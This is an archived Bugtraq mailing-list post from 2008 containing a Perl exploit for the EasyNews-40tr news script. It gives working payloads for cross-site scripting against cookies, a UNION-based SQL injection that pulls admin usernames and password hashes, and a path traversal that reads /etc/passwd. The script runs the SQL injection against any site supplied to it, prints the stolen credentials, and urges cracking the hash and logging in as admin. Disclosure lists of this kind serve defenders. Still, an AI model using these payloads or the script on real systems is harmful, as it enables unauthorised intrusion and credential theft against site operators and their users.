EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
From: irancrash@xxxxxxxxx
Date: 1 Apr 2008 01:21:11 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#!/usr/bin/perl
#####################################################################################
####                               EasyNews-40tr                                
 ####
####        Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)     
 ####
#####################################################################################
#                                                                               
    #
#Discovered by : IRCRASH By Dr.Crash                                            
    #
#Exploited By : Dr.Crash                                                        
    #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                           
    #
#                                                                               
    #
#####################################################################################
#                                                                               
    #
#Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip      
    #
#                                                                               
    #
#####################################################################################
#                                   < XSS >                                     
    #
#XSS Address : 
http://Sitename/staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_pupublish&read=<script>alert(document.cookie);</script>
#                                                                               
    #
#####################################################################################
#                                   < SQL >                                     
    #
#SQL Address : 
http://Sitename/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers
#                                                                               
    #
#####################################################################################
#                                   < LFI >                                     
    #
#SQL Address : 
http://Sitename/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00
#                                                                               
    #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                         
    #
#####################################################################################

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
sub header
{
print "
****************************************************
*       EasyNews-40tr Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH TEAM BY Dr.Crash          *
*Exploited by : IRCRASH TEAM BY Dr.Crash           *
*Our Site : IRCRASH.COM                            *
****************************************************";
}
 
sub usage
{
  print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}                                                                               
   
 
 
my %parameter = ();
GetOptions(\%parameter, "url=s");
 
$url = $parameter{"url"};
 
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = 
"/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";
 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
 
#Debug Modus delete # at beginning of next line
#print $content;
 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
 
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Md5 Password And Login In : $url/admin/\n";
print "Enjoy My friend .....\n";
 
}
 
#Starting;
print "
****************************************************
*       EasyNews-40tr Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH TEAM BY Dr.Crash          *
*Exploited by : IRCRASH TEAM BY Dr.Crash           *
****************************************************";
print "\n\nExploiting...\n";
Exploit();

Prev by Date: iDefense Security Advisory 03.31.08: Macrovision InstallShield InstallScript One-Click Install Untrusted Library Loading Vulnerability
Next by Date: [SECURITY] [DSA 1536-1] New libxine packages fix several vulnerabilities
Previous by thread: iDefense Security Advisory 03.31.08: Macrovision InstallShield InstallScript One-Click Install Untrusted Library Loading Vulnerability
Next by thread: [SECURITY] [DSA 1536-1] New libxine packages fix several vulnerabilities
Index(es):
- Date
- Thread